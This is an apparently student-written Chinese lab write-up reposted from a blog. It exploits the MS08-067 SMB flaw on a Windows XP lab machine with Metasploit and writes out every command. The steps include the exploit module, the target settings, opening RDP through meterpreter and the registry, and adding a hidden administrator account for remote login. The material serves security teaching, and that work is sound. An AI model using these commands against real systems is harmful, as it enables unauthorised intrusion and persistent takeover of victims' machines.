码迷,mamicode.com
首页 > 其他好文 > 详细

实验五

时间:2018-11-02 00:12:49      阅读:167      评论:0      收藏:0      [点我收藏+]

标签:图片   研究   源码方式   机器   包含   nop   meta   请求   目标地址   

任务三 通过漏洞获取shell  所有过程截图写博客

 windows ms08067 漏洞利用

 

一.1 知识背景

 

Metasploit是一款开源的安全漏洞检测工具,Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的shellcode ,并且不断更新。

 

Metasploit Framework并不止具有exploit(溢出)收集功能,它使你专注于创建自己的溢出模块或者二次开发。很少的一部分用汇编和C语言实现,其余均由ruby实现。总体架构:

 

 技术分享图片

 

 

 

 

 

一.2 实训环境

 

Windows XP SP3

 

IP:172.16.211.129

 

Kali Linux 

 

IP:172.16.211.128

 

一.3 实训原理

 

漏洞名称:Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)此安全更新解决了服务器服务中一个秘密报告的漏洞。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

 

一.4 漏洞利用过程

 

在msfconsole使用search命令搜索MS08067漏洞攻击程序

 技术分享图片

 

 

 

 

从结果中得到

 

exploit/windows/smb/ms08_067_netapi

 

表示当前msf框架中包含MS08067漏洞的攻击插件。

 

使用use命令调用MS08067漏洞攻击程序

 

use exploit/windows/smb/ms08_067_netapi

 

 技术分享图片

 

 

 

进入msf的交互式命令窗口下,使用show options 命令查看需要设置的选项

 

 技术分享图片

 

 

 

从图中可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)使用 set 命令设置 Module Options,此处需要设置目标IP即 set RHOST 172.16.211.129

 技术分享图片

 

 

 

 

使用 set 命令设置后,可再使用show options 命令查看设置情况

 

 技术分享图片

 

 

 

从中可以看出目标IP已经设置好接着设置Exploit target,使用show targets 查看可选项可以看出以下版本的系统均存在此漏洞

 

因为实例演示的XP系统为WinXP SP3 简体中文版对应的编号为34

 

 技术分享图片

 

使用set target 命令设置目标,此处即为set target 34

 

技术分享图片

 

 

此时再用show options 可以看到全部设置完成,接着使用exploit 或者 run 进行攻击

 

 技术分享图片

 

 技术分享图片

 

执行exploit命令后得到一个meterpreter命令行交互窗口

在meterpreter中输入run getgui -e 命令,可以打开RDP(远程桌面)服务,端口号3389

 技术分享图片

继续输入shell即可进入CMD窗口

 

 技术分享图片

 

 

 

在cmd命令下也可以通过添加注册表项的方式开启对方远程桌面服务(如果上面已经开启了,这步可以省略)。 

 

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 技术分享图片

 

 

 

 

 

 

使用netstat -ano命令查看端口是否开放,从图中可以看到已经开放3389端口。

 

 技术分享图片

 

 

 

接着使用net user命令查看XP系统中的用户

 

 技术分享图片

 

 

 

 在平台中获取shell之后,继续在命令行添加账户和管理员权限。

 

net user user pass /add   例如:net user gao 123 /add

 技术分享图片

 

net localgroup administrators /add  

 

例如:net localgroup administrators gao /add  

 技术分享图片

 

最后开启远程桌面,利用刚在添加的账户登陆被攻击机器。 

 

rdesktop -a 32 -u gao -p 123 172.16.211.129:3389

 技术分享图片

 

实验五

标签:图片   研究   源码方式   机器   包含   nop   meta   请求   目标地址   

原文地址:https://www.cnblogs.com/p201521430019/p/9841696.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!